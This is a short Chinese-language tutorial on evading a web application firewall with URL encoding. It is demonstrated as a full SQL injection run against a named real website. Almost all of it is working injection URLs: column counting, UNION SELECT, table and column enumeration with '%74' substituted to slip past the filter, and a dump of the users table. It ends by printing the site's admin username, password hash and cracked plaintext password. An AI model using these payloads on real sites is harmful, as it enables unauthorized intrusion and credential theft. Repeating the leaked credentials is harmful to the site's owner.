WAF繞過方法之URL編碼

實例講解如何利用URL編碼繞過WAF防護

SQL注入點

http://www.magrabiyemen.com/contents.php?id=3

欄位數為4

http://www.magrabiyemen.com/contents.php?id=3 order by 4

顯示位為4

http://www.magrabiyemen.com/contents.php?id=3 union select 1,2,3,4

顯示基本信息正常

http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version())

暴表的時候出現not acceptable

http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()

嘗試繞過，不成功，依然返回上圖所示

http://www.magrabiyemen.com/contents.php?id=3 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()

使用URL編碼成功繞過（t經過URL編碼後為%74）

http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(%74able_name) from informa%74ion_schema.tables where %74able_schema=da%74abase()

http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(column_name) from informa%74ion_schema.columns where table_name=CHAR(117, 115, 101, 114, 115)

http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(username,0x3a,password) from users

admin:ea4ce35c2860112178e8ae2285579919

解密出來為：admin/123456789987654321